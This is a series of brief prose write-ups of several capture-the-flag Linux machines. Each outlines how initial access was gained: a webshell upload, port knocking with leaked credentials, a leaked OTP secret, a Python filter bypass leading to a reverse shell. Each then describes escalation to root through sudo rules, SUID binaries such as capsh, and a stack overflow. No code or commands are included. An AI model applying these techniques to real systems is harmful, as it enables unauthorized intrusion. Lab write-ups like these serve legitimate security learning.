This is a Linux machine with only Web services enabled, we could upload a webshell by controlling the directory parameter of the upload API endpoint. Then we gain the initial foothold of the system.

Then we discover there is a sudo rule for our initial user which allow it to execute /bin/cp with another user. And there is a ssh service only for localhost, but we could forward it by port mapping. After that we pivot to another user by leveraging /bin/cp to write our ssh public key to authorized_keys. Finally, we get the root shell or read arbitrary file via LOTL(Live off the land) technique. Here is the /bin/man.

This is a Linux machine with only FTP service enabled at first. And then SSH and Web services will open after I knock ports from the secrets which leak by FTP. After that I obtain the user name from web secret and the password for that user within the FTP hidden file, with this credential, I gain an initial foothold on the system.

Then I find a special executable(capsh) with SUID bit set, which could be exploited to get the root shell.

This is a Linux machine with FTP, SSH, Web and TFTP services enabled. We find the id_rsa of user alexia via the hints from homepage of web service, thereby we gain an initial foothold on the system.

Then we could obtain the root's id_rsa by exploiting a special SUID program, which allow us to compromise the system.

This is a Linux machine with only the Web service enabled. By exploiting the leaked Google Authenticator secret in the source code, we gained control over OTP generation, thereby obtaining a code execution environment. Simple reconnaissance revealed it to be a Python execution environment with import keyword filtering. However, this could be bypassed using basic built-in operations, Ultimately, we established a foothold on the system via a reverse shell.

We subsequently identified a special program belonging to the root user with SUID bit set. By exploiting a simple stack overflow vulnerability to manipulate a varible, we privot to a regular user account on the system. Within that user's home directory, we discovered a special executable file. Through analysis, we obtained the root user's password.

This is a Linux machine with SSH and Web services enabled, we notice strong hints on the homepage that we need to perform base64 encoding. After base64-encoding the wordlist used for web enumeration, we obtain an encrypted SSH private key. Using john the Ripper along with the password hint on the homepage(requiring base64 encoding), we quickly obtain the decryption key and gain a foothold on the system.

Then we discover that the initial user-configured sudo rules allow us to exploit the base64 utility to read arbitrary files, thereby obtaining the root user's SSH private key and gaining full system privileges.